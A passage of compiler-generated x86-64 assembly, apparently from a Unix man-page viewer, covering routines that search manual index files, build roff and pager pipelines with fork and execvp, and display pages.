Header=BB1_63 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $10, -60(%rbp) movb %al, -84(%rbp) ## 1-byte Spill je LBB1_68 ## %bb.67: ## in Loop: Header=BB1_63 Depth=1 cmpl $-1, -60(%rbp) setne %al movb %al, -84(%rbp) ## 1-byte Spill LBB1_68: ## in Loop: Header=BB1_63 Depth=1 movb -84(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_69 jmp LBB1_72 LBB1_69: ## in Loop: Header=BB1_63 Depth=1 leaq _searchwindex.page(%rip), %rax addq $255, %rax cmpq %rax, -80(%rbp) jae LBB1_71 ## %bb.70: ## in Loop: Header=BB1_63 Depth=1 movl -60(%rbp), %eax movb %al, %cl movq -80(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -80(%rbp) movb %cl, (%rax) LBB1_71: ## in Loop: Header=BB1_63 Depth=1 movq -16(%rbp), %rdi callq _getc movl %eax, -60(%rbp) jmp LBB1_63 LBB1_72: leaq _searchwindex.page(%rip), %rax cmpq %rax, -80(%rbp) jne LBB1_74 ## %bb.73: movl $0, -4(%rbp) jmp LBB1_103 LBB1_74: movq -80(%rbp), %rax movb $0, (%rax) LBB1_75: ## =>This Inner Loop Header: Depth=1 movb $1, %al cmpl $32, -60(%rbp) movb %al, -85(%rbp) ## 1-byte Spill je LBB1_77 ## %bb.76: ## in Loop: Header=BB1_75 Depth=1 cmpl $9, -60(%rbp) sete %al movb %al, -85(%rbp) ## 1-byte Spill LBB1_77: ## in Loop: Header=BB1_75 Depth=1 movb -85(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_78 jmp LBB1_79 LBB1_78: ## in Loop: Header=BB1_75 Depth=1 movq -16(%rbp), %rdi callq _fgetc movl %eax, -60(%rbp) jmp LBB1_75 LBB1_79: cmpl $40, -60(%rbp) je LBB1_81 ## %bb.80: movl $0, -4(%rbp) jmp LBB1_103 LBB1_81: leaq _searchwindex.section(%rip), %rax movq %rax, -80(%rbp) LBB1_82: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rdi callq _fgetc movl %eax, %ecx movl %ecx, -60(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $41, %ecx movb %al, -86(%rbp) ## 1-byte Spill je LBB1_85 ## %bb.83: ## in Loop: Header=BB1_82 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $10, -60(%rbp) movb %al, -86(%rbp) ## 1-byte Spill je LBB1_85 ## %bb.84: ## in Loop: Header=BB1_82 Depth=1 cmpl $-1, -60(%rbp) setne %al movb %al, -86(%rbp) ## 1-byte Spill LBB1_85: ## in Loop: Header=BB1_82 Depth=1 movb -86(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_86 jmp LBB1_92 LBB1_86: ## in Loop: Header=BB1_82 Depth=1 movl $65, %eax cmpl -60(%rbp), %eax jg LBB1_89 ## %bb.87: ## in Loop: Header=BB1_82 Depth=1 cmpl $90, -60(%rbp) jg LBB1_89 ## %bb.88: ## in Loop: Header=BB1_82 Depth=1 movl -60(%rbp), %eax subl $65, %eax addl $97, %eax movl %eax, -60(%rbp) LBB1_89: ## in Loop: Header=BB1_82 Depth=1 leaq _searchwindex.section(%rip), %rax addq $31, %rax cmpq %rax, -80(%rbp) jae LBB1_91 ## %bb.90: ## in Loop: Header=BB1_82 Depth=1 movl -60(%rbp), %eax movb %al, %cl movq -80(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -80(%rbp) movb %cl, (%rax) LBB1_91: ## in Loop: Header=BB1_82 Depth=1 jmp LBB1_82 LBB1_92: movq -80(%rbp), %rax movb $0, (%rax) cmpl $41, -60(%rbp) jne LBB1_94 ## %bb.93: leaq _searchwindex.section(%rip), %rax cmpq %rax, -80(%rbp) jne LBB1_95 LBB1_94: movl $0, -4(%rbp) jmp LBB1_103 LBB1_95: jmp LBB1_96 LBB1_96: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, -60(%rbp) movb %al, -87(%rbp) ## 1-byte Spill je LBB1_98 ## %bb.97: ## in Loop: Header=BB1_96 Depth=1 cmpl $10, -60(%rbp) setne %al movb %al, -87(%rbp) ## 1-byte Spill LBB1_98: ## in Loop: Header=BB1_96 Depth=1 movb -87(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_99 jmp LBB1_100 LBB1_99: ## in Loop: Header=BB1_96 Depth=1 movq -16(%rbp), %rdi callq _getc movl %eax, -60(%rbp) jmp LBB1_96 LBB1_100: cmpl $10, -60(%rbp) je LBB1_102 ## %bb.101: movl $0, -4(%rbp) jmp LBB1_103 LBB1_102: movq -32(%rbp), %rax leaq _searchwindex.page(%rip), %rcx movq %rcx, (%rax) movq -40(%rbp), %rax leaq _searchwindex.section(%rip), %rcx movq %rcx, (%rax) movl $1, -4(%rbp) LBB1_103: movl -4(%rbp), %eax addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _putinline ## -- Begin function putinline .p2align 4, 0x90 _putinline: ## @putinline .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $256, %rsp ## imm = 0x100 testb %al, %al je LBB2_10 ## %bb.9: movaps %xmm0, -176(%rbp) movaps %xmm1, -160(%rbp) movaps %xmm2, -144(%rbp) movaps %xmm3, -128(%rbp) movaps %xmm4, -112(%rbp) movaps %xmm5, -96(%rbp) movaps %xmm6, -80(%rbp) movaps %xmm7, -64(%rbp) LBB2_10: movq %r9, -184(%rbp) movq %r8, -192(%rbp) movq %rcx, -200(%rbp) movq %rdx, -208(%rbp) movq %rsi, -216(%rbp) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -40(%rbp) movq _plast(%rip), %rax movq %rax, %rcx addq $64, %rcx movq %rcx, _plast(%rip) movq %rax, -48(%rbp) movq -40(%rbp), %rcx movq -48(%rbp), %rax movq %rax, %rdx addq $8, %rdx movq %rdx, -48(%rbp) movq %rcx, (%rax) leaq -32(%rbp), %rax leaq -224(%rbp), %rcx movq %rcx, 16(%rax) leaq 16(%rbp), %rcx movq %rcx, 8(%rax) movl $48, 4(%rax) movl $8, (%rax) LBB2_1: ## =>This Inner Loop Header: Depth=1 leaq -32(%rbp), %rax movq %rax, -240(%rbp) ## 8-byte Spill movl -32(%rbp), %eax movl %eax, -228(%rbp) ## 4-byte Spill cmpl $40, %eax ja LBB2_3 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movq -240(%rbp), %rcx ## 8-byte Reload movl -228(%rbp), %edx ## 4-byte Reload movslq %edx, %rax addq 16(%rcx), %rax addl $8, %edx movl %edx, (%rcx) movq %rax, -248(%rbp) ## 8-byte Spill jmp LBB2_4 LBB2_3: ## in Loop: Header=BB2_1 Depth=1 movq -240(%rbp), %rcx ## 8-byte Reload movq 8(%rcx), %rax movq %rax, %rdx addq $8, %rdx movq %rdx, 8(%rcx) movq %rax, -248(%rbp) ## 8-byte Spill LBB2_4: ## in Loop: Header=BB2_1 Depth=1 movq -248(%rbp), %rax ## 8-byte Reload movq (%rax), %rax movq -48(%rbp), %rcx movq %rcx, %rdx addq $8, %rdx movq %rdx, -48(%rbp) movq %rax, (%rcx) cmpq $0, %rax je LBB2_6 ## %bb.5: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_1 LBB2_6: leaq -32(%rbp), %rax movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_8 ## %bb.7: addq $256, %rsp ## imm = 0x100 popq %rbp retq LBB2_8: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _execute ## -- Begin function execute .p2align 4, 0x90 _execute: ## @execute .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $176, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl %edi, -28(%rbp) movq %rsi, -40(%rbp) movq _tty@GOTPCREL(%rip), %rax cmpl $0, (%rax) je LBB3_2 ## %bb.1: movq _pager@GOTPCREL(%rip), %rax movq (%rax), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline LBB3_2: movq _pipeline@GOTPCREL(%rip), %rax cmpq %rax, _plast(%rip) jne LBB3_4 ## %bb.3: leaq L_.str.2(%rip), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline LBB3_4: movq _pipeline@GOTPCREL(%rip), %rax movq %rax, -56(%rbp) LBB3_5: ## =>This Inner Loop Header: Depth=1 movq -56(%rbp), %rax cmpq $0, (%rax) je LBB3_7 ## %bb.6: ## in Loop: Header=BB3_5 Depth=1 movq -56(%rbp), %rax addq $8, %rax movq %rax, -56(%rbp) jmp LBB3_5 LBB3_7: movq -40(%rbp), %rcx movq -56(%rbp), %rax movq %rax, %rdx addq $8, %rdx movq %rdx, -56(%rbp) movq %rcx, (%rax) movq -56(%rbp), %rax movq $0, (%rax) movl $0, -68(%rbp) movq _pipeline@GOTPCREL(%rip), %rax movq %rax, -48(%rbp) LBB3_8: ## =>This Inner Loop Header: Depth=1 movq -48(%rbp), %rax cmpq _plast(%rip), %rax jae LBB3_33 ## %bb.9: ## in Loop: Header=BB3_8 Depth=1 movq -48(%rbp), %rax movq %rax, -56(%rbp) movq -48(%rbp), %rax addq $64, %rax cmpq _plast(%rip), %rax sete %al andb $1, %al movzbl %al, %eax movl %eax, -84(%rbp) leaq -24(%rbp), %rdi callq _pipe cmpl $0, %eax jl LBB3_12 ## %bb.10: ## in Loop: Header=BB3_8 Depth=1 cmpl $0, -84(%rbp) jne LBB3_13 ## %bb.11: ## in Loop: Header=BB3_8 Depth=1 leaq -16(%rbp), %rdi callq _pipe cmpl $0, %eax jge LBB3_13 LBB3_12: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -120(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -120(%rbp), %rdi ## 8-byte Reload movq %rax, %rdx leaq L_.str.3(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB3_13: ## in Loop: Header=BB3_8 Depth=1 movl -20(%rbp), %eax movl %eax, -124(%rbp) ## 4-byte Spill movl -20(%rbp), %edi movl $1, %esi movb $0, %al callq _fcntl movl -124(%rbp), %edi ## 4-byte Reload movl %eax, %edx orl $1, %edx movl $2, %esi movb $0, %al callq _fcntl callq _fork movl %eax, -72(%rbp) cmpl $0, %eax jge LBB3_15 ## %bb.14: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -136(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -136(%rbp), %rdi ## 8-byte Reload movq %rax, %rdx leaq L_.str.4(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB3_15: ## in Loop: Header=BB3_8 Depth=1 cmpl $0, -72(%rbp) jne LBB3_27 ## %bb.16: cmpl $0, -28(%rbp) je LBB3_20 ## %bb.17: movq _manpath@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _strlen movq %rax, %rdi addq $8, %rdi addq $1, %rdi shlq $0, %rdi callq _malloc movq %rax, -64(%rbp) cmpq $0, -64(%rbp) je LBB3_19 ## %bb.18: movq -64(%rbp), %rdi leaq L_.str.5(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk movq -64(%rbp), %rdi movq _manpath@GOTPCREL(%rip), %rax movq (%rax), %rsi movq $-1, %rdx callq ___strcat_chk movq -64(%rbp), %rdi callq _putenv LBB3_19: jmp LBB3_20 LBB3_20: cmpl $0, -68(%rbp) je LBB3_22 ## %bb.21: movl -68(%rbp), %edi xorl %esi, %esi callq _dup2 movl -68(%rbp), %edi callq _close LBB3_22: cmpl $0, -84(%rbp) jne LBB3_26 ## %bb.23: movl -16(%rbp), %edi callq _close cmpl $1, -12(%rbp) je LBB3_25 ## %bb.24: movl -12(%rbp), %edi movl $1, %esi callq _dup2 movl -12(%rbp), %edi callq _close LBB3_25: jmp LBB3_26 LBB3_26: movl -24(%rbp), %edi callq _close movq -56(%rbp), %rsi movq (%rsi), %rdi callq _execvp movl -20(%rbp), %eax movl %eax, -140(%rbp) ## 4-byte Spill callq ___error movl -140(%rbp), %edi ## 4-byte Reload movq %rax, %rsi movl $4, %edx callq _write movl $1, %edi callq __exit LBB3_27: ## in Loop: Header=BB3_8 Depth=1 movl -20(%rbp), %edi callq _close movl -24(%rbp), %eax movl %eax, -144(%rbp) ## 4-byte Spill callq ___error movl -144(%rbp), %edi ## 4-byte Reload movq %rax, %rsi movl $4, %edx callq _read cmpq $0, %rax je LBB3_29 ## %bb.28: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -160(%rbp) ## 8-byte Spill movq -56(%rbp), %rax movq (%rax), %rax movq %rax, -152(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -160(%rbp), %rdi ## 8-byte Reload movq -152(%rbp), %rdx ## 8-byte Reload movq %rax, %rcx leaq L_.str.6(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB3_29: ## in Loop: Header=BB3_8 Depth=1 movl -24(%rbp), %edi callq _close cmpl $0, -84(%rbp) jne LBB3_31 ## %bb.30: ## in Loop: Header=BB3_8 Depth=1 movl -12(%rbp), %edi callq _close movl -16(%rbp), %eax movl %eax, -68(%rbp) LBB3_31: ## in Loop: Header=BB3_8 Depth=1 movl $0, -28(%rbp) ## %bb.32: ## in Loop: Header=BB3_8 Depth=1 movq -48(%rbp), %rax addq $64, %rax movq %rax, -48(%rbp) jmp LBB3_8 LBB3_33: movl $2, %edi movl $1, %esi callq _signal movq %rax, -96(%rbp) movl $3, %edi movl $1, %esi callq _signal movq %rax, -104(%rbp) movl $15, %edi movl $1, %esi callq _signal movq %rax, -112(%rbp) LBB3_34: ## =>This Inner Loop Header: Depth=1 leaq -80(%rbp), %rdi callq _wait movl %eax, -76(%rbp) cmpl -72(%rbp), %eax je LBB3_38 ## %bb.35: ## in Loop: Header=BB3_34 Depth=1 cmpl $0, -76(%rbp) jge LBB3_37 ## %bb.36: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -168(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -168(%rbp), %rdi ## 8-byte Reload movq %rax, %rdx leaq L_.str.7(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB3_37: ## in Loop: Header=BB3_34 Depth=1 jmp LBB3_34 LBB3_38: movq -96(%rbp), %rsi movl $2, %edi callq _signal movq -104(%rbp), %rsi movl $3, %edi callq _signal movq -112(%rbp), %rsi movl $15, %edi callq _signal cmpl $0, -80(%rbp) je LBB3_40 ## %bb.39: movl $1, %edi callq _exit LBB3_40: movq _pipeline@GOTPCREL(%rip), %rax movq %rax, _plast(%rip) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB3_42 ## %bb.41: addq $176, %rsp popq %rbp retq LBB3_42: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _keyword ## -- Begin function keyword .p2align 4, 0x90 _keyword: ## @keyword .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl _apropos(%rip), %ecx leaq L_.str.9(%rip), %rdi leaq L_.str.8(%rip), %rax cmpl $0, %ecx cmovneq %rax, %rdi movl _all(%rip), %ecx xorl %eax, %eax movl %eax, %esi leaq L_.str.10(%rip), %rax cmpl $0, %ecx cmovneq %rax, %rsi xorl %eax, %eax movl %eax, %edx movb $0, %al callq _putinline movq _tty@GOTPCREL(%rip), %rax cmpl $0, (%rax) je LBB4_2 ## %bb.1: movq -8(%rbp), %rsi leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush LBB4_2: movq -8(%rbp), %rsi movl $1, %edi callq _execute addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _showpage ## -- Begin function showpage .p2align 4, 0x90 _showpage: ## @showpage .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $224, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq %rdx, -32(%rbp) movq -16(%rbp), %rdi leaq -176(%rbp), %rsi callq _stat$INODE64 cmpl $0, %eax jge LBB5_2 ## %bb.1: movl $0, -4(%rbp) jmp LBB5_44 LBB5_2: movzwl -172(%rbp), %eax andl $61440, %eax ## imm = 0xF000 cmpl $32768, %eax ## imm = 0x8000 je LBB5_4 ## %bb.3: movl $0, -4(%rbp) jmp LBB5_44 LBB5_4: movzwl -172(%rbp), %eax andl $73, %eax cmpl $0, %eax je LBB5_7 ## %bb.5: movq -16(%rbp), %rax movsbl (%rax), %eax cmpl $47, %eax je LBB5_7 ## %bb.6: movl $0, -4(%rbp) jmp LBB5_44 LBB5_7: cmpl $0, _quiet(%rip) je LBB5_9 ## %bb.8: movq _shown@GOTPCREL(%rip), %rax movl $1, (%rax) movl $1, -4(%rbp) jmp LBB5_44 LBB5_9: cmpl $1, -20(%rbp) je LBB5_12 ## %bb.10: cmpl $3, -20(%rbp) je LBB5_12 ## %bb.11: cmpl $5, -20(%rbp) jne LBB5_13 LBB5_12: leaq L_.str.12(%rip), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline LBB5_13: cmpl $4, -20(%rbp) je LBB5_15 ## %bb.14: cmpl $5, -20(%rbp) jne LBB5_16 LBB5_15: leaq L_.str.13(%rip), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline leaq L_.str.14(%rip), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline leaq L_.str.15(%rip), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline LBB5_16: cmpl $2, -20(%rbp) jne LBB5_34 ## %bb.17: leaq _TBL_MAGIC(%rip), %rax movq %rax, -200(%rbp) movq -16(%rbp), %rdi leaq L_.str.16(%rip), %rsi callq _fopen movq %rax, -184(%rbp) cmpq $0, %rax jne LBB5_19 ## %bb.18: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -216(%rbp) ## 8-byte Spill movq -16(%rbp), %rax movq %rax, -208(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -216(%rbp), %rdi ## 8-byte Reload movq -208(%rbp), %rdx ## 8-byte Reload movq %rax, %rcx leaq L_.str.6(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB5_19: movq -184(%rbp), %rdi callq _fgetc movl %eax, -188(%rbp) LBB5_20: ## =>This Loop Header: Depth=1 ## Child Loop BB5_28 Depth 2 movl -188(%rbp), %eax movq -200(%rbp), %rcx movsbl (%rcx), %ecx cmpl %ecx, %eax je LBB5_23 ## %bb.21: ## in Loop: Header=BB5_20 Depth=1 cmpl $39, -188(%rbp) jne LBB5_26 ## %bb.22: ## in Loop: Header=BB5_20 Depth=1 movq -200(%rbp), %rax movsbl (%rax), %eax cmpl $46, %eax jne LBB5_26 LBB5_23: ## in Loop: Header=BB5_20 Depth=1 movq -200(%rbp), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, -200(%rbp) movsbl 1(%rax), %eax cmpl $0, %eax jne LBB5_25 ## %bb.24: leaq L_.str.14(%rip), %rdi xorl %eax, %eax movl %eax, %esi movb $0, %al callq _putinline jmp LBB5_33 LBB5_25: ## in Loop: Header=BB5_20 Depth=1 jmp LBB5_27 LBB5_26: jmp LBB5_33 LBB5_27: ## in Loop: Header=BB5_20 Depth=1 jmp LBB5_28 LBB5_28: ## Parent Loop BB5_20 Depth=1 ## => This Inner Loop Header: Depth=2 movq -184(%rbp), %rdi callq _fgetc movl %eax, %ecx movl %ecx, -188(%rbp) movb $1, %al cmpl $32, %ecx movb %al, -217(%rbp) ## 1-byte Spill je LBB5_30 ## %bb.29: ## in Loop: Header=BB5_28 Depth=2 cmpl $9, -188(%rbp) sete %al movb %al, -217(%rbp) ## 1-byte Spill LBB5_30: ## in Loop: Header=BB5_28 Depth=2 movb -217(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB5_31 jmp LBB5_32 LBB5_31: ## in Loop: Header=BB5_28 Depth=2 jmp LBB5_28 LBB5_32: ## in Loop: Header=BB5_20 Depth=1 jmp LBB5_20 LBB5_33: movq -184(%rbp), %rdi callq _fclose LBB5_34: cmpl $2, -20(%rbp) je LBB5_38 ## %bb.35: cmpl $3, -20(%rbp) je LBB5_38 ## %bb.36: cmpl $4, -20(%rbp) je LBB5_38 ## %bb.37: cmpl $5, -20(%rbp) jne LBB5_39 LBB5_38: movl _rofftype(%rip), %eax movl %eax, %ecx leaq _roff(%rip), %rax movq (%rax,%rcx,8), %rdi movq -32(%rbp), %rsi xorl %eax, %eax movl %eax, %edx movb $0, %al callq _putinline LBB5_39: movq _tty@GOTPCREL(%rip), %rax cmpl $0, (%rax) je LBB5_43 ## %bb.40: movb $1, %al cmpl $0, -20(%rbp) movb %al, -218(%rbp) ## 1-byte Spill je LBB5_42 ## %bb.41: cmpl $1, -20(%rbp) sete %al movb %al, -218(%rbp) ## 1-byte Spill LBB5_42: movb -218(%rbp), %cl ## 1-byte Reload leaq L_.str.19(%rip), %rsi leaq L_.str.18(%rip), %rax testb $1, %cl cmovneq %rax, %rsi movq -16(%rbp), %rdx leaq L_.str.17(%rip), %rdi movb $0, %al callq _printf movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush LBB5_43: movq -16(%rbp), %rsi xorl %edi, %edi callq _execute movq _shown@GOTPCREL(%rip), %rax movl $1, (%rax) movl $1, -4(%rbp) LBB5_44: movl -4(%rbp), %eax addq $224, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _member ## -- Begin function member .p2align 4, 0x90 _member: ## @member .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq -16(%rbp), %rdi callq _strlen movq %rax, -32(%rbp) leaq _ALL(%rip), %rax cmpq %rax, -24(%rbp) jne LBB6_2 ## %bb.1: movl $1, -4(%rbp) jmp LBB6_17 LBB6_2: jmp LBB6_3 LBB6_3: ## =>This Loop Header: Depth=1 ## Child Loop BB6_9 Depth 2 movq -24(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax je LBB6_16 ## %bb.4: ## in Loop: Header=BB6_3 Depth=1 movq -16(%rbp), %rdi movq -24(%rbp), %rsi movq -32(%rbp), %rdx callq _strncmp cmpl $0, %eax jne LBB6_8 ## %bb.5: ## in Loop: Header=BB6_3 Depth=1 movq -24(%rbp), %rax movq -32(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $0, %eax je LBB6_7 ## %bb.6: ## in Loop: Header=BB6_3 Depth=1 movq -24(%rbp), %rax movq -32(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $44, %eax jne LBB6_8 LBB6_7: movl $1, -4(%rbp) jmp LBB6_17 LBB6_8: ## in Loop: Header=BB6_3 Depth=1 jmp LBB6_9 LBB6_9: ## Parent Loop BB6_3 Depth=1 ## => This Inner Loop Header: Depth=2 movq -24(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -33(%rbp) ## 1-byte Spill je LBB6_11 ## %bb.10: ## in Loop: Header=BB6_9 Depth=2 movq -24(%rbp), %rax movsbl (%rax), %eax cmpl $44, %eax setne %al movb %al, -33(%rbp) ## 1-byte Spill LBB6_11: ## in Loop: Header=BB6_9 Depth=2 movb -33(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB6_12 jmp LBB6_13 LBB6_12: ## in Loop: Header=BB6_9 Depth=2 movq -24(%rbp), %rax addq $1, %rax movq %rax, -24(%rbp) jmp LBB6_9 LBB6_13: ## in Loop: Header=BB6_3 Depth=1 movq -24(%rbp), %rax movsbl (%rax), %eax cmpl $44, %eax jne LBB6_15 ## %bb.14: ## in Loop: Header=BB6_3 Depth=1 movq -24(%rbp), %rax addq $1, %rax movq %rax, -24(%rbp) LBB6_15: ## in Loop: Header=BB6_3 Depth=1 jmp LBB6_3 LBB6_16: movl $0, -4(%rbp) LBB6_17: movl -4(%rbp), %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _trymandir ## -- Begin function trymandir .p2align 4, 0x90 _trymandir: ## @trymandir .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $2224, %rsp ## imm = 0x8B0 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -2080(%rbp) movq %rsi, -2088(%rbp) movq %rdx, -2096(%rbp) movq -2080(%rbp), %rdi callq _strlen addq $1, %rax addq $6, %rax addq $1, %rax cmpq $1024, %rax ## imm = 0x400 jbe LBB7_2 ## %bb.1: movl $0, -2068(%rbp) jmp LBB7_30 LBB7_2: leaq -1040(%rbp), %rdi movq -2080(%rbp), %r8 xorl %esi, %esi movl $1024, %edx ## imm = 0x400 leaq L_.str.30(%rip), %rcx movb $0, %al callq ___sprintf_chk leaq -1040(%rbp), %rdi leaq L_.str.16(%rip), %rsi callq _fopen movq %rax, -2104(%rbp) cmpq $0, %rax je LBB7_4 ## %bb.3: leaq _searchwindex(%rip), %rax movq %rax, -2144(%rbp) jmp LBB7_7 LBB7_4: leaq -1040(%rbp), %rdi movq -2080(%rbp), %r8 xorl %esi, %esi movl $1024, %edx ## imm = 0x400 leaq L_.str.31(%rip), %rcx movb $0, %al callq ___sprintf_chk leaq -1040(%rbp), %rdi leaq L_.str.16(%rip), %rsi callq _fopen movq %rax, -2104(%rbp) cmpq $0, %rax jne LBB7_6 ## %bb.5: movl $0, -2068(%rbp) jmp LBB7_30 LBB7_6: leaq _searchwhatis(%rip), %rax movq %rax, -2144(%rbp) LBB7_7: movl $0, -2128(%rbp) LBB7_8: ## =>This Loop Header: Depth=1 ## Child Loop BB7_16 Depth 2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -2128(%rbp) movb %al, -2153(%rbp) ## 1-byte Spill jne LBB7_10 ## %bb.9: ## in Loop: Header=BB7_8 Depth=1 movq -2144(%rbp), %rax movq -2104(%rbp), %rdi movq -2088(%rbp), %rsi leaq -2112(%rbp), %rdx leaq -2120(%rbp), %rcx callq *%rax movl %eax, -2124(%rbp) cmpl $1, %eax sete %al movb %al, -2153(%rbp) ## 1-byte Spill LBB7_10: ## in Loop: Header=BB7_8 Depth=1 movb -2153(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB7_11 jmp LBB7_26 LBB7_11: ## in Loop: Header=BB7_8 Depth=1 movq -2120(%rbp), %rdi movq -2096(%rbp), %rsi callq _member cmpl $0, %eax jne LBB7_13 ## %bb.12: ## in Loop: Header=BB7_8 Depth=1 jmp LBB7_8 LBB7_13: ## in Loop: Header=BB7_8 Depth=1 movq -2080(%rbp), %rdi callq _strlen movq %rax, -2176(%rbp) ## 8-byte Spill movq -2120(%rbp), %rdi callq _strlen movq %rax, %rcx movq -2176(%rbp), %rax ## 8-byte Reload shlq $1, %rcx addq %rcx, %rax movq %rax, -2168(%rbp) ## 8-byte Spill movq -2112(%rbp), %rdi callq _strlen movq %rax, %rcx movq -2168(%rbp), %rax ## 8-byte Reload addq %rcx, %rax addq $10, %rax cmpq $1024, %rax ## imm = 0x400 jbe LBB7_15 ## %bb.14: ## in Loop: Header=BB7_8 Depth=1 jmp LBB7_8 LBB7_15: ## in Loop: Header=BB7_8 Depth=1 leaq _trymandir.searchN(%rip), %rax movq %rax, -2152(%rbp) movl $10, -2132(%rbp) LBB7_16: ## Parent Loop BB7_8 Depth=1 ## => This Inner Loop Header: Depth=2 movq -2152(%rbp), %rax cmpl $1, (%rax) ja LBB7_19 ## %bb.17: ## in Loop: Header=BB7_16 Depth=2 cmpl $0, _rofftype(%rip) je LBB7_19 ## %bb.18: ## in Loop: Header=BB7_16 Depth=2 jmp LBB7_20 LBB7_19: ## in Loop: Header=BB7_16 Depth=2 leaq -2064(%rbp), %rdi movq -2152(%rbp), %rax movq 8(%rax), %rcx movq -2080(%rbp), %r8 movq -2120(%rbp), %r9 movq -2112(%rbp), %r10 movq -2120(%rbp), %rax xorl %esi, %esi movl $1024, %edx ## imm = 0x400 movq %r10, (%rsp) movq %rax, 8(%rsp) movb $0, %al callq ___sprintf_chk leaq -2064(%rbp), %rdi movq -2152(%rbp), %rax movl (%rax), %esi leaq L_.str.32(%rip), %rdx callq _showpage movl %eax, -2128(%rbp) LBB7_20: ## in Loop: Header=BB7_16 Depth=2 movq -2152(%rbp), %rax addq $16, %rax movq %rax, -2152(%rbp) xorl %eax, %eax ## kill: def $al killed 